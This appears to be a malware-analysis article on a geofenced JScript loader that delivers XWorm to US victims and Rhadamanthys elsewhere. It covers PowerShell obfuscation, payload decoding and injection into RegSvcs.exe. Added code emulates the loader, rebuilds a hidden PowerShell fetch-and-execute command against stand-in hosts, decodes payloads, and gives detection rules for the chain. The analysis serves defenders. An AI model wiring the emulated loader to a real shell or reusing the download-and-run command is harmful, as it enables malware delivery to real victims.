Unmasking Xworm Payload Execution Path through Jailbreaking a Malicious JScript Loader
Security researchers are analyzing a sophisticated malware delivery mechanism that uses a JScript loader to deploy different payloads based on the victim’s geographic location.
This loader initiates a complex chain involving obfuscated PowerShell scripts, ultimately executing potent malware like the XWorm Remote Access Trojan (RAT) or the Rhadamanthys information stealer.
The attack often begins via a scheduled task or through ClickFix attacks involving fake CAPTCHAs, which execute an mshta.exe command to trigger the loader.
JScript to PowerShell Loader
The core of the initial stage involves a JScript file designed to construct and execute a PowerShell command.
To evade detection, the PowerShell code is not stored directly but is split into segments within an array, often in a randomized order.
When the JScript runs, it dynamically reassembles these segments into the correct sequence, forming the PowerShell command.
This command is responsible for downloading and executing the next stage of the attack, followed by cleaning up its tracks.
A key feature of this loader is its use of geofencing. Before proceeding, the loader checks the victim’s geographical location by sending an API request to a geolocation service.
It parses the response to determine the country associated with the IP address. If the country is identified as the “United States”, the loader delivers the XWorm RAT.
For victims located outside the U.S., it deploys the Rhadamanthys stealer instead.
This geofencing tactic allows attackers to target specific regions, potentially maximizing impact while minimizing unwanted exposure or analysis from researchers in non-targeted areas.
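The two loader behaviours described above, segment reassembly and the geofence branch, in an added emulation that is not the loader's own code. It runs under Node (JScript is a JavaScript dialect, so the structure carries over). The segments, index table, stage-2 URLs, the geolocation field name "country" and the fallback to the non-US branch on an unparseable response are all constructed or assumed here; the point is that the HTTP lookup and the execution sink are injected, so an analyst can capture the rebuilt command instead of running it.

```javascript
// Added emulation of the segment-array loader pattern; illustrative code,
// not the loader's own. All data below is constructed.

// Constructed: the PowerShell command stored as shuffled fragments plus the
// index table that restores their order. %URL% is a placeholder filled in
// after the geofence check.
const SEGMENTS = [
  "-Command ",
  "powershell.exe ",
  "$u='%URL%'; ",
  "-NoProfile -WindowStyle Hidden ",
  "iex (iwr $u -UseBasicParsing)",
];
const ORDER = [1, 3, 0, 2, 4];

// Hypothetical stage-2 locations, one per payload family.
const STAGE2_URL = {
  xworm: "https://example.invalid/us",
  rhadamanthys: "https://example.invalid/intl",
};

// Reassemble the fragments by walking the index table.
function reassemble(segments, order) {
  return order.map((i) => segments[i]).join("");
}

// Geofence branch: "United States" selects XWorm, anything else selects
// Rhadamanthys. The JSON field name "country" and the fallback on an
// unparseable response are assumptions, not observed loader behaviour.
function selectPayload(geoResponse) {
  let country = "";
  try {
    country = String(JSON.parse(geoResponse).country || "");
  } catch (e) {
    country = "";
  }
  return country === "United States" ? "xworm" : "rhadamanthys";
}

// Loader logic with its two side effects (HTTP lookup, command execution)
// injected. In JScript these would be an XMLHTTP object and WScript.Shell;
// an analyst supplies stubs so the command is captured, not executed.
function runLoader(http, shell) {
  const payload = selectPayload(http.get("https://geo.example.invalid/json"));
  const cmd = reassemble(SEGMENTS, ORDER).replace("%URL%", STAGE2_URL[payload]);
  shell.Run(cmd, 0, false); // WScript.Shell.Run(command, windowStyle, waitOnReturn)
  return payload;
}

// Analyst harness: canned geolocation answer, execution sink replaced by a
// recorder. Returns the payload branch taken and what would have run.
function analyzeLoader(country) {
  const executed = [];
  const http = { get: () => JSON.stringify({ status: "success", country }) };
  const shell = { Run: (cmd) => { executed.push(cmd); return 0; } };
  const payload = runLoader(http, shell);
  return { payload, executed };
}
```

Feeding both a US and a non-US answer through `analyzeLoader` yields the two stage-2 commands without any network access or execution; the same stub approach applies to a real sample by replacing `WScript.Shell` and the XMLHTTP object before the loader body runs.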
Multi-Stage PowerShell Execution
Focusing on the path for U.S.-based victims (leading to XWorm), the delivered PowerShell script employs multiple layers of obfuscation and anti-analysis techniques.
Initial Steps and Cleanup
The script begins by decoding strings stored as sequences of decimal character codes. It then sets the execution policy for the current process to "Unrestricted" so that subsequent commands run without hindrance; because the change is process-scoped, it needs no administrative rights and leaves no persistent policy change behind.
The script actively attempts to terminate running processes that might interfere or belong to analysis tools, including mshta.exe, wscript.exe, msbuild.exe, and any process whose name matches the pattern *.bat.exe.
It also performs file system cleanup, removing script and shortcut files (.bat, .ps1, .lnk, .cmd, .vbs) from directories such as APPDATA, PUBLIC, Startup, and ProgramData.
Deobfuscation and Payload Handling
A temporary directory is created, and a small deobfuscation script held in a variable is written to a file there. Curiously, the loader then executes the variable's contents rather than the file, so the on-disk copy is never run.
This executed variable then processes another variable containing the next stage script, converting it from decimal representation to executable text using a function.
Another variable holds the final malware payload (XWorm), but it remains untouched until the very last script in the chain. After the deobfuscation, the temporary file and directory are deleted.
Final Payload Injection
The script obtained from deobfuscation orchestrates the final steps. It reverses the contents of two key variables: one for the XWorm payload and one for a malicious loader.
Both variables contain data stored in reverse order as decimal values. A function converts these reversed decimal strings into executable byte arrays.
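The two encodings this chain relies on, decimal character codes for script text (the decoding step in the Initial Steps and Deobfuscation sections) and decimal byte values stored in reverse order for the loader and XWorm payload, as added analyst helpers that are not code from the article. Separators, the sample script line and the sample payload bytes are constructed; the `MZ` check is the usual sanity test that a decoded blob is a PE file rather than a mis-parsed array.

```javascript
// Added decoders for the article's two encodings; not the malware's code.
// Sample inputs below are constructed. Runs under Node (uses Buffer).

// Decode a run of decimal character codes into text. Separator assumed to
// be commas, whitespace or both.
function decimalToText(encoded) {
  return encoded.trim().split(/[\s,]+/).filter(Boolean)
    .map((n) => String.fromCharCode(parseInt(n, 10))).join("");
}

// Encoder, used here only to build the constructed sample.
function textToDecimal(text, sep = ",") {
  return Array.from(text, (ch) => ch.charCodeAt(0)).join(sep);
}

// Decode a reversed decimal byte sequence into a Buffer: restore the order
// first, then turn each value into a byte. Anything outside 0..255 means
// the array was parsed wrongly, so it is rejected instead of truncated.
function reversedDecimalToBytes(encoded) {
  const values = encoded.trim().split(/[\s,]+/).filter(Boolean)
    .map((n) => parseInt(n, 10));
  for (const v of values) {
    if (!Number.isInteger(v) || v < 0 || v > 255) throw new Error("not a byte: " + v);
  }
  return Buffer.from(values.reverse());
}

// Sanity check on a decoded payload: a PE file starts with "MZ".
function looksLikePE(buf) {
  return buf.length >= 2 && buf[0] === 0x4d && buf[1] === 0x5a;
}

// Constructed stage-3 script line, decimal encoded as the article describes.
const SAMPLE_SCRIPT = "Set-ExecutionPolicy Unrestricted -Scope Process";
const SAMPLE_ENCODED = textToDecimal(SAMPLE_SCRIPT);

// Constructed payload: an "MZ" header plus a few bytes, stored reversed.
const SAMPLE_PAYLOAD_BYTES = [0x4d, 0x5a, 0x90, 0x00, 0x03];
const SAMPLE_PAYLOAD_ENCODED = SAMPLE_PAYLOAD_BYTES.slice().reverse().join(" ");

// Decode a payload variable and report whether it is a PE image.
function decodePayload(encoded) {
  const bytes = reversedDecimalToBytes(encoded);
  return { bytes, isPE: looksLikePE(bytes) };
}
```

On a real sample the decoded text is what the next stage would have executed, and `decodePayload` gives the loader assembly and XWorm image as files that can be hashed and analysed without ever invoking the reflective loader.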
The resulting malicious loader is then loaded directly into memory via .NET reflection from PowerShell, so the script can call its methods without the assembly ever being written to disk.
The script dynamically retrieves specific methods from the loaded assembly. It defines the paths to the legitimate .NET utility RegSvcs.exe, which exists under each installed .NET Framework version directory.
Finally, it invokes the retrieved method, passing the RegSvcs.exe path and the final XWorm payload. This injects the XWorm malware into the memory space of a legitimate RegSvcs.exe process, a technique similar to process hollowing, allowing the malware to run under the guise of a trusted Microsoft executable. The script concludes with further cleanup actions.
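An added detection sketch over process-creation telemetry for the chain described in this section and the cleanup section; it is not code from the article. The event fields and sample events are constructed. The parent/child pairs are inferred from the chain (mshta.exe or wscript.exe running the JScript, which spawns PowerShell, which starts RegSvcs.exe for injection); that RegSvcs.exe appears as a child of powershell.exe is an assumption about how the injector creates its target. The command-line heuristics mirror the kill list and the script-file cleanup the article reports.

```javascript
// Added detection sketch; not the article's code. Sample events constructed.
// Parent/child expectations are inferred from the described chain; the
// RegSvcs.exe parent is an assumption.

const PARENT_CHILD_RULES = [
  { parent: /^(mshta|wscript)\.exe$/i, child: /^powershell\.exe$/i,
    rule: "script host spawned PowerShell" },
  { parent: /^powershell\.exe$/i, child: /^regsvcs\.exe$/i,
    rule: "PowerShell spawned RegSvcs.exe" },
];

// Command-line heuristics for the cleanup behaviour the article describes:
// killing script hosts or *.bat.exe processes, and deleting script or
// shortcut files from user-writable startup locations.
const CMDLINE_RULES = [
  { re: /stop-process[^;|]*(mshta|wscript|msbuild|\.bat\.exe)/i,
    rule: "PowerShell kills script hosts" },
  { re: /remove-item[^;|]*(appdata|public|startup|programdata)[^;|]*\.(bat|ps1|lnk|cmd|vbs)/i,
    rule: "PowerShell deletes scripts from startup paths" },
];

function basename(path) {
  return path.split(/[\\/]/).pop();
}

// Run every rule over process-creation events; returns {pid, rule} findings.
function detect(events) {
  const byPid = new Map(events.map((e) => [e.pid, e]));
  const findings = [];
  for (const ev of events) {
    const child = basename(ev.image);
    const parentEv = byPid.get(ev.ppid);
    const parent = parentEv ? basename(parentEv.image) : "";
    for (const r of PARENT_CHILD_RULES) {
      if (r.parent.test(parent) && r.child.test(child)) {
        findings.push({ pid: ev.pid, rule: r.rule });
      }
    }
    for (const r of CMDLINE_RULES) {
      if (r.re.test(ev.cmd)) findings.push({ pid: ev.pid, rule: r.rule });
    }
  }
  return findings;
}

// Constructed events: the malicious chain plus one benign PowerShell run.
const SAMPLE_EVENTS = [
  { pid: 1892, ppid: 1000, image: "C:\\Windows\\explorer.exe", cmd: "explorer.exe" },
  { pid: 4120, ppid: 1892, image: "C:\\Windows\\System32\\mshta.exe",
    cmd: "mshta https://example.invalid/loader" },
  { pid: 4188, ppid: 4120,
    image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    cmd: "powershell -NoProfile -Command \"Stop-Process -Name mshta,wscript -Force; Remove-Item $env:APPDATA\\*.lnk\"" },
  { pid: 4230, ppid: 4188,
    image: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe",
    cmd: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe" },
  { pid: 5001, ppid: 1892,
    image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    cmd: "powershell -File C:\\scripts\\backup.ps1" },
];
```

Run against `SAMPLE_EVENTS`, the PowerShell child of mshta.exe trips all three of its rules and the RegSvcs.exe child trips the injection-target rule, while the benign PowerShell run from explorer.exe produces nothing. The parent/child rules are the more robust of the two sets; the command-line patterns are easy for a new variant to evade and should be treated as corroboration.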
Malware Payloads
XWorm (USA Target)
Delivered to U.S. victims, XWorm is a .NET-based RAT active since mid-2022. It possesses a wide array of capabilities, including DDoS attacks, ransomware functions, clipboard manipulation (specifically targeting cryptocurrency addresses), keylogging, and spreading via USB drives.
It employs anti-analysis techniques like checking for debuggers, virtual machines, and specific analysis environments, often using mutexes to prevent multiple instances.
XWorm establishes persistence, communicates with command-and-control (C2) servers, often using AES encryption, and can download additional plugins or modules.
Rhadamanthys (Non-USA Target)
Victims outside the U.S. receive Rhadamanthys, a C++ information stealer first seen around August 2022.
Sold via subscription, it targets credentials from browsers, VPNs, email clients, chat applications, and cryptocurrency wallets.
Rhadamanthys uses sophisticated obfuscation, including code virtualization and a custom embedded file system.
A notable recent addition is an AI-powered OCR feature to extract cryptocurrency seed phrases directly from images stored on the victim’s machine. It often uses multi-stage loaders and employs anti-analysis checks.
Despite being banned on some forums for targeting Russia, it remains actively developed and distributed, often via malvertising or phishing emails containing malicious attachments.
This attack chain demonstrates a high degree of sophistication, combining JScript, PowerShell, multi-layered obfuscation, geofencing, and fileless execution techniques to deliver tailored malware payloads while evading detection.